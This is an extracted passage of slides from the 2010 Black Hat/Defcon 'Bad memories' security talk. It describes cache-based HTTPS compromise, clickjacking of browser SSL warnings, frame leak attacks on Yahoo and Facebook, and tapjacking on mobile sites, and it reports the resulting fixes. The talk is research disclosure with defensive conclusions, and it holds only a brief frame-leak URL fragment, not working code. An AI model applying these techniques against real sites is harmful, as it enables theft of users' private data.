![Page 91: Bad memories - Blackhat & Defcon 2010](https://reader034.fdocuments.us/reader034/viewer/2022042619/5872850e1a28abc7068b6f7f/html5/thumbnails/91.jpg)
Elie Bursztein, Baptiste Gourdin, Gustav Rydstedt, Dan Boneh Bad memories http://ly.tl/t9
Shared library and cache
A single malicious library cached leads to multiple compromised HTTPS sessions
JQuery Google analytics
![Page 92: Bad memories - Blackhat & Defcon 2010](https://reader034.fdocuments.us/reader034/viewer/2022042619/5872850e1a28abc7068b6f7f/html5/thumbnails/92.jpg)
Elie Bursztein, Baptiste Gourdin, Gustav Rydstedt, Dan Boneh Bad memories http://ly.tl/t9
Defending against injection attack
![Page 93: Bad memories - Blackhat & Defcon 2010](https://reader034.fdocuments.us/reader034/viewer/2022042619/5872850e1a28abc7068b6f7f/html5/thumbnails/93.jpg)
Elie Bursztein, Baptiste Gourdin, Gustav Rydstedt, Dan Boneh Bad memories http://ly.tl/t9
How to inject a malicious shared library ?
![Page 94: Bad memories - Blackhat & Defcon 2010](https://reader034.fdocuments.us/reader034/viewer/2022042619/5872850e1a28abc7068b6f7f/html5/thumbnails/94.jpg)
Elie Bursztein, Baptiste Gourdin, Gustav Rydstedt, Dan Boneh Bad memories http://ly.tl/t9
Trust the user
https://twitter.com
![Page 95: Bad memories - Blackhat & Defcon 2010](https://reader034.fdocuments.us/reader034/viewer/2022042619/5872850e1a28abc7068b6f7f/html5/thumbnails/95.jpg)
Elie Bursztein, Baptiste Gourdin, Gustav Rydstedt, Dan Boneh Bad memories http://ly.tl/t9
Trust the user
![Page 96: Bad memories - Blackhat & Defcon 2010](https://reader034.fdocuments.us/reader034/viewer/2022042619/5872850e1a28abc7068b6f7f/html5/thumbnails/96.jpg)
Elie Bursztein, Baptiste Gourdin, Gustav Rydstedt, Dan Boneh Bad memories http://ly.tl/t9
` Comodo
92% of SSL certificates are invalid
Ivan Ristic Qualys
![Page 97: Bad memories - Blackhat & Defcon 2010](https://reader034.fdocuments.us/reader034/viewer/2022042619/5872850e1a28abc7068b6f7f/html5/thumbnails/97.jpg)
http://ly.tl/t9Elie Bursztein, Baptiste Gourdin, Gustav Rydstedt, Dan Boneh Bad memories
Firefox Study
Site Identity
![Page 98: Bad memories - Blackhat & Defcon 2010](https://reader034.fdocuments.us/reader034/viewer/2022042619/5872850e1a28abc7068b6f7f/html5/thumbnails/98.jpg)
Elie Bursztein, Baptiste Gourdin, Gustav Rydstedt, Dan Boneh Bad memories http://ly.tl/t9
How many user click on the identity info ?
9%
3.4%
1.4%
Mozilla
![Page 99: Bad memories - Blackhat & Defcon 2010](https://reader034.fdocuments.us/reader034/viewer/2022042619/5872850e1a28abc7068b6f7f/html5/thumbnails/99.jpg)
Elie Bursztein, Baptiste Gourdin, Gustav Rydstedt, Dan Boneh Bad memories http://ly.tl/t9
Weakening SSL warning
What about tricking the browser so it doesn’t display the standard warning ?
![Page 100: Bad memories - Blackhat & Defcon 2010](https://reader034.fdocuments.us/reader034/viewer/2022042619/5872850e1a28abc7068b6f7f/html5/thumbnails/100.jpg)
http://ly.tl/t9Bad memoriesElie Bursztein, Baptiste Gourdin, Gustav Rydstedt, Dan Boneh
IE standard warning
![Page 101: Bad memories - Blackhat & Defcon 2010](https://reader034.fdocuments.us/reader034/viewer/2022042619/5872850e1a28abc7068b6f7f/html5/thumbnails/101.jpg)
http://ly.tl/t9Elie Bursztein, Baptiste Gourdin, Gustav Rydstedt, Dan Boneh Bad memories
IE : demo
![Page 102: Bad memories - Blackhat & Defcon 2010](https://reader034.fdocuments.us/reader034/viewer/2022042619/5872850e1a28abc7068b6f7f/html5/thumbnails/102.jpg)
http://ly.tl/t9Bad memoriesElie Bursztein, Baptiste Gourdin, Gustav Rydstedt, Dan Boneh
IE: another inconsistency
![Page 103: Bad memories - Blackhat & Defcon 2010](https://reader034.fdocuments.us/reader034/viewer/2022042619/5872850e1a28abc7068b6f7f/html5/thumbnails/103.jpg)
Elie Bursztein, Baptiste Gourdin, Gustav Rydstedt, Dan Boneh Bad memories http://ly.tl/t9
Firefox standard warning
![Page 104: Bad memories - Blackhat & Defcon 2010](https://reader034.fdocuments.us/reader034/viewer/2022042619/5872850e1a28abc7068b6f7f/html5/thumbnails/104.jpg)
http://ly.tl/t9Bad memoriesElie Bursztein, Baptiste Gourdin, Gustav Rydstedt, Dan Boneh
Firefox challenge
We are not able to remove the warning
![Page 105: Bad memories - Blackhat & Defcon 2010](https://reader034.fdocuments.us/reader034/viewer/2022042619/5872850e1a28abc7068b6f7f/html5/thumbnails/105.jpg)
Elie Bursztein, Baptiste Gourdin, Gustav Rydstedt, Dan Boneh Bad memories http://ly.tl/t9
Clickjacking 101
![Page 106: Bad memories - Blackhat & Defcon 2010](https://reader034.fdocuments.us/reader034/viewer/2022042619/5872850e1a28abc7068b6f7f/html5/thumbnails/106.jpg)
Elie Bursztein, Baptiste Gourdin, Gustav Rydstedt, Dan Boneh Bad memories http://ly.tl/t9
Clickjacking 101
![Page 107: Bad memories - Blackhat & Defcon 2010](https://reader034.fdocuments.us/reader034/viewer/2022042619/5872850e1a28abc7068b6f7f/html5/thumbnails/107.jpg)
Elie Bursztein, Baptiste Gourdin, Gustav Rydstedt, Dan Boneh Bad memories http://ly.tl/t9
Clickjacking 101
![Page 108: Bad memories - Blackhat & Defcon 2010](https://reader034.fdocuments.us/reader034/viewer/2022042619/5872850e1a28abc7068b6f7f/html5/thumbnails/108.jpg)
http://ly.tl/t9Bad memoriesElie Bursztein, Baptiste Gourdin, Gustav Rydstedt, Dan Boneh
Firefox challenge solved
![Page 109: Bad memories - Blackhat & Defcon 2010](https://reader034.fdocuments.us/reader034/viewer/2022042619/5872850e1a28abc7068b6f7f/html5/thumbnails/109.jpg)
http://ly.tl/t9Bad memoriesElie Bursztein, Baptiste Gourdin, Gustav Rydstedt, Dan Boneh
Firefox challenge solved
Not able to remove the warning doesn’t mean we
can’t clickjack it
![Page 110: Bad memories - Blackhat & Defcon 2010](https://reader034.fdocuments.us/reader034/viewer/2022042619/5872850e1a28abc7068b6f7f/html5/thumbnails/110.jpg)
http://ly.tl/t9Elie Bursztein, Baptiste Gourdin, Gustav Rydstedt, Dan Boneh Bad memories
Firefox clickjacking demo
![Page 111: Bad memories - Blackhat & Defcon 2010](https://reader034.fdocuments.us/reader034/viewer/2022042619/5872850e1a28abc7068b6f7f/html5/thumbnails/111.jpg)
Bad memories http://ly.tl/t9Elie Bursztein, Baptiste Gourdin, Gustav RydstedtElie Bursztein, Baptiste Gourdin, Gustav Rydstedt, Dan Boneh
Stealing private data using frame leak attacks
![Page 112: Bad memories - Blackhat & Defcon 2010](https://reader034.fdocuments.us/reader034/viewer/2022042619/5872850e1a28abc7068b6f7f/html5/thumbnails/112.jpg)
Elie Bursztein, Baptiste Gourdin, Gustav Rydstedt, Dan Boneh Bad memories http://ly.tl/t9
Clickjacking history
• Coined by J. Grossman and R. Hansen in 2008
• Scrolling attack by P. Stone 2010
![Page 113: Bad memories - Blackhat & Defcon 2010](https://reader034.fdocuments.us/reader034/viewer/2022042619/5872850e1a28abc7068b6f7f/html5/thumbnails/113.jpg)
Elie Bursztein, Baptiste Gourdin, Gustav Rydstedt, Dan Boneh Bad memories http://ly.tl/t9
Frame leak attack
Elie Bursztein, Baptiste Gourdin, Gustav Rydstedt, Dan Boneh Bad memories http://ly.tl/t9
src = http://www.m.yahoo.com
![Page 114: Bad memories - Blackhat & Defcon 2010](https://reader034.fdocuments.us/reader034/viewer/2022042619/5872850e1a28abc7068b6f7f/html5/thumbnails/114.jpg)
Elie Bursztein, Baptiste Gourdin, Gustav Rydstedt, Dan Boneh Bad memories http://ly.tl/t9
Frame leak attack
Elie Bursztein, Baptiste Gourdin, Gustav Rydstedt, Dan Boneh Bad memories http://ly.tl/t9
src = http://www.m.yahoo.com
id=”checkbox-29”
![Page 115: Bad memories - Blackhat & Defcon 2010](https://reader034.fdocuments.us/reader034/viewer/2022042619/5872850e1a28abc7068b6f7f/html5/thumbnails/115.jpg)
Elie Bursztein, Baptiste Gourdin, Gustav Rydstedt, Dan Boneh Bad memories http://ly.tl/t9
leftScroll : 0topScroll : 10
Frame leak attack
Elie Bursztein, Baptiste Gourdin, Gustav Rydstedt, Dan Boneh Bad memories http://ly.tl/t9
src = http://www.m.yahoo.com.com#checkbox-29
id=”checkbox-29”
![Page 116: Bad memories - Blackhat & Defcon 2010](https://reader034.fdocuments.us/reader034/viewer/2022042619/5872850e1a28abc7068b6f7f/html5/thumbnails/116.jpg)
http://ly.tl/t9Elie Bursztein, Baptiste Gourdin, Gustav Rydstedt, Dan Boneh Bad memories
Yahoo frame leak attack demo
![Page 117: Bad memories - Blackhat & Defcon 2010](https://reader034.fdocuments.us/reader034/viewer/2022042619/5872850e1a28abc7068b6f7f/html5/thumbnails/117.jpg)
Elie Bursztein, Baptiste Gourdin, Gustav Rydstedt, Dan Boneh Bad memories http://ly.tl/t9
The Facebook clickjacking defense
![Page 118: Bad memories - Blackhat & Defcon 2010](https://reader034.fdocuments.us/reader034/viewer/2022042619/5872850e1a28abc7068b6f7f/html5/thumbnails/118.jpg)
Elie Bursztein, Baptiste Gourdin, Gustav Rydstedt, Dan Boneh Bad memories http://ly.tl/t9
The Facebook clickjacking defensewww.badguy.com
![Page 119: Bad memories - Blackhat & Defcon 2010](https://reader034.fdocuments.us/reader034/viewer/2022042619/5872850e1a28abc7068b6f7f/html5/thumbnails/119.jpg)
Elie Bursztein, Baptiste Gourdin, Gustav Rydstedt, Dan Boneh Bad memories http://ly.tl/t9
The Facebook clickjacking defensewww.badguy.com
![Page 120: Bad memories - Blackhat & Defcon 2010](https://reader034.fdocuments.us/reader034/viewer/2022042619/5872850e1a28abc7068b6f7f/html5/thumbnails/120.jpg)
Elie Bursztein, Baptiste Gourdin, Gustav Rydstedt, Dan Boneh Bad memories http://ly.tl/t9
The Facebook clickjacking defense
![Page 121: Bad memories - Blackhat & Defcon 2010](https://reader034.fdocuments.us/reader034/viewer/2022042619/5872850e1a28abc7068b6f7f/html5/thumbnails/121.jpg)
http://ly.tl/t9Elie Bursztein, Baptiste Gourdin, Gustav Rydstedt, Dan Boneh Bad memories
Facebook frame leak attack demo
![Page 122: Bad memories - Blackhat & Defcon 2010](https://reader034.fdocuments.us/reader034/viewer/2022042619/5872850e1a28abc7068b6f7f/html5/thumbnails/122.jpg)
http://ly.tl/t9Elie Bursztein, Baptiste Gourdin, Gustav Rydstedt, Dan Boneh Bad memories
Vulnerability fixed
Facebook updated their clickjacking defense, they are not displaying your info behind the black div anymore
![Page 123: Bad memories - Blackhat & Defcon 2010](https://reader034.fdocuments.us/reader034/viewer/2022042619/5872850e1a28abc7068b6f7f/html5/thumbnails/123.jpg)
Bad memories http://ly.tl/t1Elie Bursztein, Baptiste Gourdin, Gustav Rydstedt
Tapjacking: clickjacking on steroid
![Page 124: Bad memories - Blackhat & Defcon 2010](https://reader034.fdocuments.us/reader034/viewer/2022042619/5872850e1a28abc7068b6f7f/html5/thumbnails/124.jpg)
54 Millions of smartphone sold during the 1Q 2010
![Page 125: Bad memories - Blackhat & Defcon 2010](https://reader034.fdocuments.us/reader034/viewer/2022042619/5872850e1a28abc7068b6f7f/html5/thumbnails/125.jpg)
Elie Bursztein, Baptiste Gourdin, Gustav Rydstedt, Dan Boneh Bad memories http://ly.tl/t9
rise of smartphone (stats)
53% of Alexa top 500 websites have a mobile site
![Page 126: Bad memories - Blackhat & Defcon 2010](https://reader034.fdocuments.us/reader034/viewer/2022042619/5872850e1a28abc7068b6f7f/html5/thumbnails/126.jpg)
Elie Bursztein, Baptiste Gourdin, Gustav Rydstedt, Dan Boneh Bad memories http://ly.tl/t9
Phone Usability
• Phone browsers provide specific usability features
• These features give the attacker a complete control over the screen real estate
• The attacker can also zoom to the element of his choice
Yuan Niu, Francis Hsu, Hao Chen 2008
![Page 127: Bad memories - Blackhat & Defcon 2010](https://reader034.fdocuments.us/reader034/viewer/2022042619/5872850e1a28abc7068b6f7f/html5/thumbnails/127.jpg)
Slide deck 2010 http://ly.tl/t1Elie Bursztein, Baptiste Gourdin, Gustav Rydstedt
Session handling
• Browsers kill session cookies, Mobiles don’t
• Non-session cookies tends to live longer on mobile sites
![Page 128: Bad memories - Blackhat & Defcon 2010](https://reader034.fdocuments.us/reader034/viewer/2022042619/5872850e1a28abc7068b6f7f/html5/thumbnails/128.jpg)
Phishing demo
![Page 130: Bad memories - Blackhat & Defcon 2010](https://reader034.fdocuments.us/reader034/viewer/2022042619/5872850e1a28abc7068b6f7f/html5/thumbnails/130.jpg)
Elie Bursztein, Baptiste Gourdin, Gustav Rydstedt, Dan Boneh Bad memories http://ly.tl/t9
Spoofing the URL bar
![Page 131: Bad memories - Blackhat & Defcon 2010](https://reader034.fdocuments.us/reader034/viewer/2022042619/5872850e1a28abc7068b6f7f/html5/thumbnails/131.jpg)
Elie Bursztein, Baptiste Gourdin, Gustav Rydstedt, Dan Boneh Bad memories http://ly.tl/t9
Tapjacking
![Page 132: Bad memories - Blackhat & Defcon 2010](https://reader034.fdocuments.us/reader034/viewer/2022042619/5872850e1a28abc7068b6f7f/html5/thumbnails/132.jpg)
Elie Bursztein, Baptiste Gourdin, Gustav Rydstedt, Dan Boneh Bad memories http://ly.tl/t9
Tapjacking ?
![Page 133: Bad memories - Blackhat & Defcon 2010](https://reader034.fdocuments.us/reader034/viewer/2022042619/5872850e1a28abc7068b6f7f/html5/thumbnails/133.jpg)
Elie Bursztein, Baptiste Gourdin, Gustav Rydstedt, Dan Boneh Bad memories http://ly.tl/t9
Tapjacking ?
Tapjacking = clickjacking on steroids
![Page 134: Bad memories - Blackhat & Defcon 2010](https://reader034.fdocuments.us/reader034/viewer/2022042619/5872850e1a28abc7068b6f7f/html5/thumbnails/134.jpg)
Elie Bursztein, Baptiste Gourdin, Gustav Rydstedt, Dan Boneh Bad memories http://ly.tl/t9
0%
25%
50%
75%
100%
Top 10 Top 100 Top 500
Regular sites
Clickjacking protection among Alexa Top sites
Alexa
![Page 135: Bad memories - Blackhat & Defcon 2010](https://reader034.fdocuments.us/reader034/viewer/2022042619/5872850e1a28abc7068b6f7f/html5/thumbnails/135.jpg)
Elie Bursztein, Baptiste Gourdin, Gustav Rydstedt, Dan Boneh Bad memories http://ly.tl/t9
0%
25%
50%
75%
100%
Top 10 Top 100 Top 500
mobile sites
Clickjacking protection among Alexa Top sites
Alexa
![Page 136: Bad memories - Blackhat & Defcon 2010](https://reader034.fdocuments.us/reader034/viewer/2022042619/5872850e1a28abc7068b6f7f/html5/thumbnails/136.jpg)
Tapjacking demo
![Page 138: Bad memories - Blackhat & Defcon 2010](https://reader034.fdocuments.us/reader034/viewer/2022042619/5872850e1a28abc7068b6f7f/html5/thumbnails/138.jpg)
Elie Bursztein Slide deck 2010 http://ly.tl/t1
Vulnerability fixed
The Twitter mobile website now use a
framebusting code
![Page 139: Bad memories - Blackhat & Defcon 2010](https://reader034.fdocuments.us/reader034/viewer/2022042619/5872850e1a28abc7068b6f7f/html5/thumbnails/139.jpg)
Elie Bursztein, Baptiste Gourdin, Gustav Rydstedt, Dan Boneh Bad memories http://ly.tl/t9
Conclusion
• WPA key can be stolen from a web page
• Wifi network can be geo-localized within 500 meters
• Compromise SSL sessions using caching attacks
• A single injection allows to target multiple web sites
• Break the same origin policy via Frame leak attack
• Tap-jacking : clickjacking on steroids for smartphones
• Mobile sites must prevent framing !
![Page 140: Bad memories - Blackhat & Defcon 2010](https://reader034.fdocuments.us/reader034/viewer/2022042619/5872850e1a28abc7068b6f7f/html5/thumbnails/140.jpg)
Elie Bursztein, Baptiste Gourdin, Gustav Rydstedt, Dan Boneh Bad memories http://ly.tl/t9
For the videos and the latest version of the slides go to
http://ly.tl/t9